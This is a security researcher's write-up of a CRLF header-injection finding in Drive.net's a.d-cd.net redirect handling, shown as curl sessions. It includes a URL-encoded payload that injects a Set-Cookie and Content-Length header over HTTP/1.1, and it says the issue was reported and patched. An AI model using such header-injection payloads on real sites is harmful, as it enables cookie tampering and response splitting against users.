Drive.net CRLF Injection

   

desciption

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
ubuntu@rwx:~$ curl -v 'http://a.d-cd.net/'
> GET / HTTP/1.1
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx
< Date: Tue, 28 Jan 2020 19:39:09 GMT
< Content-Type: text/html
< Content-Length: 162
< Connection: keep-alive
< Location: https://a.d-cd.net/
< X-Clacks-Overhead: GNU Terry Pratchett
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

I did not understand the contents of the server associated with the domain a.d-cd.net and did not perform analysis on the server.
Since a.d-cd.net server basically supports hsts. If you we try http request, It will be redirected to https.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/'
* Trying 146.255.192.80...
* TCP_NODELAY set
* Connected to a.d-cd.net (146.255.192.80) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-ECDSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=RU; L=\U041C\U043E\U0441\U043A\U0432\U0430; O=DRIVE LLC; CN=*.d-cd.net
* start date: Nov 29 00:00:00 2019 GMT
* expire date: Feb 1 12:00:00 2022 GMT
* subjectAltName: host "a.d-cd.net" matched cert's "*.d-cd.net"
* issuer: C=US; O=DigiCert Inc; CN=DigiCert SHA2 Secure Server CA
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55bd1505f580)
> GET / HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 404
< server: nginx
< date: Tue, 28 Jan 2020 19:40:07 GMT
< content-type: text/html
< content-length: 146
< vary: Accept-Encoding
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

The next time I tried https request, you will see that the message at the top, supports ALPN and server offers in the order of h2 > http/1.1.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ubuntu@rwx:~$ curl -v https://a.d-cd.net/path
> GET /path HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 404
< server: nginx
< date: Tue, 28 Jan 2020 19:23:01 GMT
< content-length: 0
< x-request-id: 64624053cd48806af4bbbd43aa200100
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
* Connection #0 to host a.d-cd.net left intact

Therefore, when we request a webpage with curl or other browsers that support ALPN will communicate over HTTP/2 .

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
ubuntu@rwx:~$ curl -v https://a.d-cd.net/path?
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55600336c580)
> GET /path? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 301
< server: nginx
< date: Tue, 28 Jan 2020 19:23:20 GMT
< content-type: text/html
< content-length: 162
< location: https://a.d-cd.net/path
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

Scanning the server, I noticed something unusual.
Regardless of the content, If URL ?a=b (search) part exists, server remove it and make us redirect again.
I think it’s for caching, but I’m not sure.

1
2
3
http://a.d-cd.net/ (301) -> https://a.d-cd.net/ (404)
https://a.d-cd.net/ (404)
https://a.d-cd.net/? (301 redirect) -> https://a.d-cd.net/ (404)

simply, http request is redirected to https.
and https request that contains ?... is redirected without ?...... part.
when the part of ? is deleted, the part of path makes url decoded in response.

1
2
3
4
5
6
7
8
9
10
11
12
13
ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/path%0aheader:%20value%0a?'
> GET /path%0aheader:%20value%0a? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
* http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [location], value: [https://a.d-cd.net/path
header: value
]
* HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)
* Connection #0 to host a.d-cd.net left intact
curl: (92) HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)

I thought this would be available for crlf injection, but the h2 setting would allow meta-data verification.
Blocking was being performed by error when trying to crlf injection.
I don’t know if this is intended, but h2 errors are preventing malicious headers from being inserted into the browser.

img

The above screen shows the occurrence of a http2 error in the latest version of Chrome when you connect to the address https://a.d-cd.net/%0aa%0a? (browsers support http2 causes the same as curl)

These errors can work as a mitigation, but It is not sufficient.
The browser prefers http2 communication, but is server still support http1.1 or earlier.
When a user connects to a server using a proxy does not support http2, the browsers will connects with http1.1
so It may makes header injection plainly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ubuntu@rwx:~$ curl -v --http1.1 'https://a.d-cd.net/path%0aset-cookie:%20evil=123123;%0acontent-length:%20306%0a?'
> GET /path%0aset-cookie:%20evil=123123;%0acontent-length:%20306%0a? HTTP/1.1
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx
< Date: Tue, 28 Jan 2020 19:34:16 GMT
< Content-Type: text/html
< Content-Length: 162
< Location: https://a.d-cd.net/path
< set-cookie: evil=123123;
< content-length: 306
<
Connection: keep-alive
X-Clacks-Overhead: GNU Terry Pratchett
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31622400

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

For example, curl sends a request with the http1.1 option.
You can verify that it is received with the set-cookie header without errors.

In conclusion, crlf injection is possible if the user uses a proxy or browser that does not support http2 (ALPN).
Any header and content can be inserted into the response packet.


  • 20/01/29 Reported
  • 20/01/31 Patched